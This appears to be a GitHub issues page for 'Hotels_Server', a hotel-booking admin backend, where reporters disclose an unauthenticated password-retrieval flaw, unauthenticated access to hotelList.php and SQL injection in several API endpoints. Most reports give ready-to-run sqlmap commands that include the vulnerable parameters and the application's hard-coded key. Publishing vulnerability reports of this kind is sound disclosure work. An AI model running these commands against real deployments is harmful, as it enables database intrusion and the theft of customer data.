Hotels_Server icon indicating copy to clipboard operation
Hotels_Server copied to clipboard

酒店预订系统后台管理系统

Results 16 Hotels_Server issues
Sort by recently updated
recently updated
newest added

Hotels_Server /view/login.php Enter user name unauthenticated user get password login.php post data to doAction.php user name unauthenticated user get password code: ![2](https://user-images.githubusercontent.com/102706674/160961567-aebb202b-4efb-4508-a7be-d1bc03cd8616.PNG) ![2](https://user-images.githubusercontent.com/102706674/160961225-4232dca6-e03c-465e-8efd-29f03576d537.png)

/view/hotelList.php Unauthorized Access Vulnerability code: ![捕获](https://user-images.githubusercontent.com/102706674/160957609-6717f280-6f07-4ce7-97a2-d4842b8c256b.PNG) No user authentication code visit link :http://host/view/hotelList.php Can view background data ![1](https://user-images.githubusercontent.com/102706674/160957670-82a6e0a7-af38-4c51-b674-0e222e51443b.png)

In /controller/fetchpwd.php It will receive a parameter called "username" to search for existed users. But in fact,this parameter just become a part of the SQL request without any process,so it...

In /controller/api/login.php It will receive a parameter called "telephone" to search for existed users. But in fact,this parameter just become a part of the SQL request without any process,so it...

url /controller/api/Order.php exist SQL Injection sqlmap -u "http://10.211.55.10/controller/api/Order.php?telephone=1&key=TheHotelReversationApplication&request=1" author: [email protected]

exists sql inject in /controller/api/RandomHotel.php sqlmap -u "http://10.211.55.10/controller/api/RandomHotel.php?key=TheHotelReversationApplication&city=1" author:[email protected]

SQL Injection exists : /controller/api/orderList.php sqlmap -u "http://10.211.55.10/controller/api/orderList.php?telephone=1&request=1" author:[email protected]

SQL Injection exists /controller/api/RevokeOrder.php sqlmap -u "http://10.211.55.10/controller/api/RevokeOrder.php?key=TheHotelReversationApplication&city=1&orderId=1" ![8EF56AAE-BE92-4510-8431-3862C80FD972](https://user-images.githubusercontent.com/29982232/67928821-ebe9b780-fbf6-11e9-9259-3a4ab3079de5.png) author:[email protected]

SQL Injection exists /controller/api/Room.php hotelId sqlmap -u "http://10.211.55.10/controller/api/Room.php?key=TheHotelReversationApplication&hotelId=1" author:[email protected]

payload url : sqlmap -u "http://10.211.55.10/controller/api/hotelList.php?subjectId=2&key=TheHotelReversationApplication&request=1" [email protected]